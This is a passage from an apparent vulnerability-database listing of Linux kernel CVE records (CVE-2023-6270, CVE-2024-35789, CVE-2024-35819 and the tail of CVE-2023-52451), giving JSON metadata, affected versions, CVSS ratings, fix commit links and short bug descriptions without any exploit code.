"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bb79613a9a704469ddb8d6c6029d532a5cea384c"
},
{
"url": "https://git.kernel.org/stable/c/9b5f03500bc5b083c0df696d7dd169d7ef3dd0c7"
},
{
"url": "https://git.kernel.org/stable/c/b582aa1f66411d4adcc1aa55b8c575683fb4687e"
},
{
"url": "https://git.kernel.org/stable/c/999a27b3ce9a69d54ccd5db000ec3a447bc43e6d"
},
{
"url": "https://git.kernel.org/stable/c/026fd977dc50ff4a5e09bfb0603557f104d3f3a0"
},
{
"url": "https://git.kernel.org/stable/c/df16afba2378d985359812c865a15c05c70a967e"
},
{
"url": "https://git.kernel.org/stable/c/708a4b59baad96c4718dc0bd3a3427d3ab22fedc"
},
{
"url": "https://git.kernel.org/stable/c/bd68ffce69f6cf8ddd3a3c32549d1d2275e49fc5"
}
],
"title": "powerpc/pseries/memhp: Fix access beyond end of drmem array",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52451",
"datePublished": "2024-02-22T16:21:42.295Z",
"dateReserved": "2024-02-20T12:30:33.293Z",
"dateUpdated": "2025-05-04T07:36:49.045Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6270 (GCVE-0-2023-6270)
Vulnerability from cvelistv5
Published
2024-01-04 17:01
Modified
2025-11-20 18:08
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A flaw was found in the ATA over Ethernet (AoE) driver in the Linux kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on `struct net_device`, and a use-after-free can be triggered by racing between the free on the struct and the access through the `skbtxq` global queue. This could lead to a denial of service condition or potential code execution.
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 6 |
cpe:/o:redhat:enterprise_linux:6 |
||||||||||||||||||||||||||||||||
|
||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6270",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-22T13:48:09.407937Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-22T13:48:53.219Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:28:20.376Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6270"
},
{
"name": "RHBZ#2256786",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256786"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2024-01-04T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the ATA over Ethernet (AoE) driver in the Linux kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on `struct net_device`, and a use-after-free can be triggered by racing between the free on the struct and the access through the `skbtxq` global queue. This could lead to a denial of service condition or potential code execution."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-20T18:08:29.004Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6270"
},
{
"name": "RHBZ#2256786",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256786"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-09-29T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2024-01-04T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: aoe: improper reference count leads to use-after-free vulnerability",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_redhatCweChain": "CWE-911-\u003eCWE-416: Improper Update of Reference Count leads to Use After Free"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-6270",
"datePublished": "2024-01-04T17:01:51.165Z",
"dateReserved": "2023-11-23T14:31:28.637Z",
"dateUpdated": "2025-11-20T18:08:29.004Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35789 (GCVE-0-2024-35789)
Vulnerability from cvelistv5
Published
2024-05-17 12:24
Modified
2025-05-21 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: mac80211: check/clear fast rx for non-4addr sta VLAN changes
When moving a station out of a VLAN and deleting the VLAN afterwards, the
fast_rx entry still holds a pointer to the VLAN's netdev, which can cause
use-after-free bugs. Fix this by immediately calling ieee80211_check_fast_rx
after the VLAN change.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a7f1721684628b8ae6015bca9a176046ee6f30cc Version: bd7e90c82850f49c23004d54de14e46d373748a6 Version: cc413b375c6d95e68a4629cb1ba9d099de78ebb9 Version: dd0b45538146cb6a54d6da7663b8c3afd16ebcfd Version: dd0b45538146cb6a54d6da7663b8c3afd16ebcfd Version: dd0b45538146cb6a54d6da7663b8c3afd16ebcfd Version: dd0b45538146cb6a54d6da7663b8c3afd16ebcfd Version: dd0b45538146cb6a54d6da7663b8c3afd16ebcfd Version: dd0b45538146cb6a54d6da7663b8c3afd16ebcfd Version: 22bc2a4814440c4a8979a381f46fec5d224f5c11 Version: 7cfe824f681e1aaac34ea64bb4def8a77801b672 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35789",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T14:19:23.131138Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:29.281Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.402Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea9a0cfc07a7d3601cc680718d9cff0d6927a921"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be1dd9254fc115321d6fbee042026d42afc8d931"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8b067c4058c0121ac8ca71559df8e2e08ff1a7e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c8bddbd91bc8e42c961a5e2cec20ab879f21100f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7eeabcea79b67cc29563e6a9a5c81f9e2c664d5b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b948b54c8bd620725e0c906e44b10c0b13087a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2884a50f52313a7a911de3afcad065ddbb3d78fc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8678551c0243f799b4859448781cbec1bd6f1cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4f2bdb3c5e3189297e156b3ff84b140423d64685"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mac80211/cfg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ea9a0cfc07a7d3601cc680718d9cff0d6927a921",
"status": "affected",
"version": "a7f1721684628b8ae6015bca9a176046ee6f30cc",
"versionType": "git"
},
{
"lessThan": "be1dd9254fc115321d6fbee042026d42afc8d931",
"status": "affected",
"version": "bd7e90c82850f49c23004d54de14e46d373748a6",
"versionType": "git"
},
{
"lessThan": "e8b067c4058c0121ac8ca71559df8e2e08ff1a7e",
"status": "affected",
"version": "cc413b375c6d95e68a4629cb1ba9d099de78ebb9",
"versionType": "git"
},
{
"lessThan": "c8bddbd91bc8e42c961a5e2cec20ab879f21100f",
"status": "affected",
"version": "dd0b45538146cb6a54d6da7663b8c3afd16ebcfd",
"versionType": "git"
},
{
"lessThan": "7eeabcea79b67cc29563e6a9a5c81f9e2c664d5b",
"status": "affected",
"version": "dd0b45538146cb6a54d6da7663b8c3afd16ebcfd",
"versionType": "git"
},
{
"lessThan": "6b948b54c8bd620725e0c906e44b10c0b13087a7",
"status": "affected",
"version": "dd0b45538146cb6a54d6da7663b8c3afd16ebcfd",
"versionType": "git"
},
{
"lessThan": "2884a50f52313a7a911de3afcad065ddbb3d78fc",
"status": "affected",
"version": "dd0b45538146cb6a54d6da7663b8c3afd16ebcfd",
"versionType": "git"
},
{
"lessThan": "e8678551c0243f799b4859448781cbec1bd6f1cb",
"status": "affected",
"version": "dd0b45538146cb6a54d6da7663b8c3afd16ebcfd",
"versionType": "git"
},
{
"lessThan": "4f2bdb3c5e3189297e156b3ff84b140423d64685",
"status": "affected",
"version": "dd0b45538146cb6a54d6da7663b8c3afd16ebcfd",
"versionType": "git"
},
{
"status": "affected",
"version": "22bc2a4814440c4a8979a381f46fec5d224f5c11",
"versionType": "git"
},
{
"status": "affected",
"version": "7cfe824f681e1aaac34ea64bb4def8a77801b672",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/mac80211/cfg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.19.189",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.114",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.32",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.232",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.11.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: check/clear fast rx for non-4addr sta VLAN changes\n\nWhen moving a station out of a VLAN and deleting the VLAN afterwards, the\nfast_rx entry still holds a pointer to the VLAN\u0027s netdev, which can cause\nuse-after-free bugs. Fix this by immediately calling ieee80211_check_fast_rx\nafter the VLAN change."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:12:34.451Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ea9a0cfc07a7d3601cc680718d9cff0d6927a921"
},
{
"url": "https://git.kernel.org/stable/c/be1dd9254fc115321d6fbee042026d42afc8d931"
},
{
"url": "https://git.kernel.org/stable/c/e8b067c4058c0121ac8ca71559df8e2e08ff1a7e"
},
{
"url": "https://git.kernel.org/stable/c/c8bddbd91bc8e42c961a5e2cec20ab879f21100f"
},
{
"url": "https://git.kernel.org/stable/c/7eeabcea79b67cc29563e6a9a5c81f9e2c664d5b"
},
{
"url": "https://git.kernel.org/stable/c/6b948b54c8bd620725e0c906e44b10c0b13087a7"
},
{
"url": "https://git.kernel.org/stable/c/2884a50f52313a7a911de3afcad065ddbb3d78fc"
},
{
"url": "https://git.kernel.org/stable/c/e8678551c0243f799b4859448781cbec1bd6f1cb"
},
{
"url": "https://git.kernel.org/stable/c/4f2bdb3c5e3189297e156b3ff84b140423d64685"
}
],
"title": "wifi: mac80211: check/clear fast rx for non-4addr sta VLAN changes",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35789",
"datePublished": "2024-05-17T12:24:42.323Z",
"dateReserved": "2024-05-17T12:19:12.338Z",
"dateUpdated": "2025-05-21T09:12:34.451Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35819 (GCVE-0-2024-35819)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
soc: fsl: qbman: Use raw spinlock for cgr_lock
smp_call_function always runs its callback in hard IRQ context, even on
PREEMPT_RT, where spinlocks can sleep. So we need to use a raw spinlock
for cgr_lock to ensure we aren't waiting on a sleeping task.
Although this bug has existed for a while, it was not apparent until
commit ef2a8d5478b9 ("net: dpaa: Adjust queue depth on rate change")
which invokes smp_call_function_single via qman_update_cgr_safe every
time a link goes up or down.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: 96f413f47677366e0ae03797409bfcc4151dbf9e Version: a85c525bbff4d7467d7f0ab6fed8e2f787b073d6 Version: 29cd9c2d1f428c281962135ea046a9d7bda88d14 Version: 5b10a404419f0532ef3ba990c12bebe118adb6d7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35819",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:39:14.512560Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:43:06.859Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.550Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b3fede8225133671ce837c0d284804aa3bc7a02"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff50716b7d5b7985979a5b21163cd79fb3d21d59"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/32edca2f03a6cc42c650ddc3ad83d086e3f365d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a3ca8292ce9fdcce122706c28c3f07bc857fe5e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d6b5aac451c9cc12e43ab7308e0e2ddc52c62c14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54d26adf64c04f186098b39dba86b86037084baa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f39d36b7540cf0088ed7ce2de2794f2aa237f6df"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd53a8ae5aacb4ecd25088486dea1cd02e74b506"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fbec4e7fed89b579f2483041fabf9650fb0dd6bc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/soc/fsl/qbman/qman.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2b3fede8225133671ce837c0d284804aa3bc7a02",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "ff50716b7d5b7985979a5b21163cd79fb3d21d59",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "32edca2f03a6cc42c650ddc3ad83d086e3f365d1",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "9a3ca8292ce9fdcce122706c28c3f07bc857fe5e",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "d6b5aac451c9cc12e43ab7308e0e2ddc52c62c14",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "54d26adf64c04f186098b39dba86b86037084baa",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "f39d36b7540cf0088ed7ce2de2794f2aa237f6df",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "cd53a8ae5aacb4ecd25088486dea1cd02e74b506",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"lessThan": "fbec4e7fed89b579f2483041fabf9650fb0dd6bc",
"status": "affected",
"version": "96f413f47677366e0ae03797409bfcc4151dbf9e",
"versionType": "git"
},
{
"status": "affected",
"version": "a85c525bbff4d7467d7f0ab6fed8e2f787b073d6",
"versionType": "git"
},
{
"status": "affected",
"version": "29cd9c2d1f428c281962135ea046a9d7bda88d14",
"versionType": "git"
},
{
"status": "affected",
"version": "5b10a404419f0532ef3ba990c12bebe118adb6d7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/soc/fsl/qbman/qman.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.32",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.15.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsoc: fsl: qbman: Use raw spinlock for cgr_lock\n\nsmp_call_function always runs its callback in hard IRQ context, even on\nPREEMPT_RT, where spinlocks can sleep. So we need to use a raw spinlock\nfor cgr_lock to ensure we aren\u0027t waiting on a sleeping task.\n\nAlthough this bug has existed for a while, it was not apparent until\ncommit ef2a8d5478b9 (\"net: dpaa: Adjust queue depth on rate change\")\nwhich invokes smp_call_function_single via qman_update_cgr_safe every\ntime a link goes up or down."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:49.933Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2b3fede8225133671ce837c0d284804aa3bc7a02"
},
{
"url": "https://git.kernel.org/stable/c/ff50716b7d5b7985979a5b21163cd79fb3d21d59"
},
{
"url": "https://git.kernel.org/stable/c/32edca2f03a6cc42c650ddc3ad83d086e3f365d1"
},
{
